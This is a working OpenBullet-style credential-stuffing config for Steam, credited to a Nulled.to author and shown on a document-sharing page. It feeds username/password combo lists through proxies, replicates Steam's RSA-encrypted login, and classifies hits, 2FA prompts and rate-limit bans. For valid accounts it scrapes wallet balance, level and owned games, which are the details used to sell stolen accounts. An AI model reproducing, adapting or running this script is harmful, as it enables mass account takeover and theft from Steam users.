You are on page 1of 3

[SETTINGS]

{
"Name": "Steam",
"SuggestedBots": 50,
"MaxCPM": 0,
"LastModified": "2019-10-13T11:51:47.4830218+02:00",
"AdditionalInfo": "Bogdan/Nulled.to",
"Author": "Bogdan",
"Version": "1.1.4",
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"EncodeData": false,
"AllowedWordlist1": "UserPass",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://store.steampowered.com/login/?l=english"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)


like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Ban OR
KEY "<SOURCE>" DoesNotContain "<title>Login</title>"

FUNCTION CurrentUnixTime -> VAR "unix1"

REQUEST POST "https://store.steampowered.com/login/getrsakey/"


CONTENT "donotcache=<unix1>&username=<USER>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)
like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
HEADER "X-Requested-With: XMLHttpRequest"

PARSE "<SOURCE>" LR "publickey_mod\":\"" "\"" -> VAR "key"

PARSE "<SOURCE>" LR "publickey_exp\":\"" "\"" -> VAR "exp"

PARSE "<SOURCE>" LR "timestamp\":\"" "\"" -> VAR "time"


FUNCTION RSA "<key>" "<exp>" "<PASS>" -> VAR "rsa"

FUNCTION URLEncode "<rsa>" -> VAR "p1"

FUNCTION CurrentUnixTime -> VAR "unix2"

REQUEST POST "https://store.steampowered.com/login/dologin/"


CONTENT
"donotcache=<unix2>&username=<USER>&emailauth=&captchagid=&captcha_text=&emailsteam
id=&password=<p1>&rsatimestamp=<time>&remember_login=true"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)
like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
HEADER "X-Requested-With: XMLHttpRequest"

KEYCHECK
KEYCHAIN Failure OR
KEY "Incorrect account name or password."
KEY "The account name or password that you have entered is incorrect"
KEYCHAIN Success OR
KEY "success\":true"
KEYCHAIN Custom "CUSTOM" OR
KEY "emailauth_needed\":true"
KEY "requires_twofactor\":true"
KEYCHAIN Ban OR
KEY "captcha_needed\":true"
KEY "There have been too many login failures from your network in a short time
period."

PARSE "<SOURCE>" LR "steamid\":\"" "\"" -> VAR "id"

REQUEST GET "https://store.steampowered.com/account/"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)


like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0
.8"
HEADER "Referer: https://store.steampowered.com/login/?l=english"
HEADER "Upgrade-Insecure-Requests: 1"

KEYCHECK
KEYCHAIN Success OR
KEY "s account</title>"

PARSE "<SOURCE>" LR "username\" href=\"https://steamcommunity.com/id/" "/home/\""


-> VAR "user"

PARSE "<SOURCE>" LR "class=\"accountData price\"><a


href=\"https://store.steampowered.com/account/history/\">" "</a></div>"
CreateEmpty=FALSE -> CAP "Wallet Balance" "Bogdan/nulled.to | " ""

REQUEST GET "https://steamcommunity.com/id/<user>"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)


like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0
.8"
HEADER "Referer: https://store.steampowered.com/login/?l=english"
HEADER "Upgrade-Insecure-Requests: 1"

KEYCHECK
KEYCHAIN Success OR
KEY "<span class=\"friendPlayerLevelNum\">"

PARSE "<SOURCE>" LR "<span class=\"friendPlayerLevelNum\">" "</span></div></div"


CreateEmpty=FALSE -> CAP "Steam Level"

REQUEST GET "https://steamcommunity.com/profiles/<id>/games/?tab=all"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)


like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0
.8"
HEADER "Referer: https://store.steampowered.com/login/?l=english"
HEADER "Upgrade-Insecure-Requests: 1"

KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Custom "CUSTOM" OR
KEY "<SOURCE>" DoesNotContain ",\"name\":\""

PARSE "<SOURCE>" LR "var rgGames = " "var rgChangingGames " -> VAR "games0"

FUNCTION CountOccurrences ",\"name\":\"" "<games0>" -> CAP "Total Games"

PARSE "<SOURCE>" LR ",\"name\":\"" "\",\"" Recursive=TRUE CreateEmpty=FALSE -> CAP


"Games"

You might also like